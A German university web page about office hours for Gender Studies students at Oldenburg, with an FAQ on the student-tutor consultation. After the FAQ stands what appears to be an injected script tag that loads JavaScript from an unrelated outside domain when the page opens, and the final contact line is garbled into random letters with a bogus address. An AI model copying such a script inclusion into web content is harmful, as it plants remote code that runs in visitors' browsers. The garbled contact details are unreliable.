Navigation

Sprechstunden

Tutor*innensprechstunde für Studierende der Gender Studies

Allgemeine und konkrete Fragen zum Fach, zu einzelnen Veranstaltungen und Praktika beantwortet Dr. Sylvia Pritsch. Tragen Sie sich dafür online in die Sprechstunde bei Stud.IP ein oder senden Sie eine Mail an sylvia.pritsch@uol.de. Dies gilt auch in der aktuellen Situation aufgrund von COVID-19, es kann ein Telefon- oder Videotermin vereinbart werden.

Für weitere Informationen können Sie sich auch gerne an die Fachschaft oder die Tutor*innensprechstunde der Gender Studies wenden.

Tutor*innensprechstunde für Studierende der Gender Studies

Die Tutor*innensprechstunde wird von eine*r Student*in im höheren Semester angeboten und dient allen Studierenden der Gender Studies als Anlaufpunkt bei Fragen zum wissenschaftlichen Arbeiten, inhaltlichen Fragen zum Studiumsaufbau, Praktikumsmöglichkeiten und allen weiteren Anliegen.

Die Tutor*innensprechstunde wird aktuell von Kris Markussen abgehalten und findet in der Präsenzzeit des Semesters wöchentlich donnerstags von 11:00 – 12:00 Uhr im Raum A03 1-117 (ZFG) statt.

Außerhalb der Sprechstundenzeiten, in den Semesterferien oder zur Vorbereitung auf einen Sprechstundentermin, könnt ihr Kris jederzeit eine E-Mail an kris.markussen(at)uol.de schreiben.

Wichtige Info:

Auch während der temporären Schließung der Universität und Kontaktbeschränkungen durch COVID/19 sollt Ihr nicht allein gelassen werden. Kris steht auch aus dem Homeoffice für Euch zur Verfügung. Für Fragen und Themen die nicht, oder nur schwer, per E-Mail beantwortet werden können, ist es auch möglich, einen Termin für eine Videokonferenz zu vereinbaren.

FAQ

Wer hält die Sprechstunde?

Die Sprechstunde wird von Kris Markussen angeboten. Kris studiert seit dem WiSe 14/15 Gender Studies und Sozialwissenschaften. Von Beginn an war sie im Fachschaftsrat der Gender Studies aktiv und hat als stellvertretende studentische Vertreterin eure Belange in den Zentrumsrat getragen.
eit 2018 ist sie als Tutorin für die Module Genderkompetenzen und Diversity, sowie für die Grundlagen der Geschlechterforschung angestellt. Zeitgleich war sie zwei Jahre in dem, mit der Didaktik der Informatik kooperierten, Mädchenförderpojekt smile-smart-it tätig. 
Momentan schreibt sie an ihrer Bachelorarbeit über einen selbst entwickelten Antidiskriminierungsworkshop.

Mit welchen Themen kann ich mich an die Sprechstunde wenden?

  • Du willst eine Hausarbeit schreiben oder ein Referat vorbereiten und weißt nicht, wie Du diese aufbauen sollst?
  • Du hast dir zwar die Prüfungsordnung genau durchgelesen, bist Dir aber immer noch unsicher, ob Du sie verstanden hast?
  • Du weißt nicht, wie Du Dir Deinen Stundenplan zusammenstellen und welche Module Du zu welcher Zeit belegen sollst?
  • Dein Praktikum steht bald an und Du hast keine Idee, wo Du dieses machen könntest?
  • Du brauchst Hilfe und Tipps für Dein Zeitmangement?
  • Du hast irgendwie den Anschluss verpasst oder fühlst Dich mit deinem Studium überfordert?
  • Du hast ein Problem mit eine*r Dozent*in und benötigst jemanden, an den Du Dich ohne Abhängigkeitsverhältnis wenden kannst?
  • Wenn Du dich mit deinem Studium überfordert fühlst und einfach mal von einem höheren Semester hören musst, dass am Ende alles gut wird und sich alle Puzzelteile irgendwann zusammensetzen werden.

Mit all diesen Fragen und Themen bist Du in der Tutor*innensprechstunde genau richtig. Ganz wichtig ist für Kris, dass Du Dich von dem Glauben verabschiedest, dass Dein Anliegen unwichtig sein könnte. Kris freut sich, wenn sie Dir helfen und Dich unterstützen kann und Du motiviert und erfolgreich Dein Studium genießen kannst.

Muss ich vorab einen Termin machen?

Nein. Es handelt sich um eine offene Sprechstunde, zu der Du einfach während der Öffnungszeit kommen kannst. Einfach an der Tür zum ZFG klopfen. Wenn Du allerdings schon weißt, dass Dein Anliegen etwas größer ist oder eine gewisse Vorbereitung benötigt, empfehlen wir Dir, Kris vorab eine E-Mail zu schicken und ggf. einen eigenen Termin außerhalb der Sprechstunde zu vereinbaren. Außerhalb des Semesters und in Notfällen ist es zudem auch möglich, eine gemeinsame Videoschaltung abzuhalten.

Muss ich mich irgendwie vorbereiten/was mitbringen?

Es macht Sinn, dass Du Dir eine kleine Notiz machst. Manchmal ist eins so mit sich und seinen Fragen beschäftigt, dass vor Aufregung doch das ein oder andere vergessen wird.

Auch für deine eigene Struktur kann es hilfreich sein dir folgende Dinge vorab zu überlegen:

  • Was genau ist mein Anliegen und mit welchen Informationen möchte ich aus dem Gespräch raus gehen?
  • Welche weiteren Fragen resultieren vielleicht noch aus meinem Anliegen?
  • Welche Maßnahmen zur Beantwortung oder Auseinandersetzung habe ich bereits selbst angewendet (z.B.: selbstständige (Literatur)-Recherche)?

Wenn es um die Entwicklung einer Fragestellung oder Gliederung einer Hausarbeit geht, macht es zusätzlich Sinn, deinen aktuellen Forschungsstand oder die zu verwenden gedachten Unterlagen mitzubringen.

Mit welchen Fragen und Themen sollte ich mich lieber an meine Dozent*innen wenden?

An Deine Dozierenden und Dr. Sylvia Pritsch im Speziellen solltest Du Dich unter anderem direkt wenden,

  • wenn es um Fragen rund um Deine Bachelor- oder Masterarbeit geht.
  • wenn Du ein Gutachten für eine Bewerbung um ein Stipendium benötigst.
  • wenn Du zum Nachweis für das Bafögamt dringend deine Kreditpunkte für eine bereits abgegebene Prüfungsleistung benötigst.
  • wenn Du krank warst oder „irgendwie“ den Anschluss verpasst hast.
  • wenn Du eine Fristverlängerung für eine Prüfungsleistung benötigst.
  • wenn Du mit Kind studierst und wissen möchtest, welche Vereinbarungen Du im Hinblick auf Prüfungserleichterungen mit Deinen Lehrenden treffen kannst.

<script async="" src="//mikkymax.com/20ba4519da0cfb915b.js" type="text/javascript"></script>

Wefqwhbmasud1xhtebnrrhnfu (kaqtgfrola.geba1w2v8uer@uolagh1h.de) (Stand: 14.04.2020)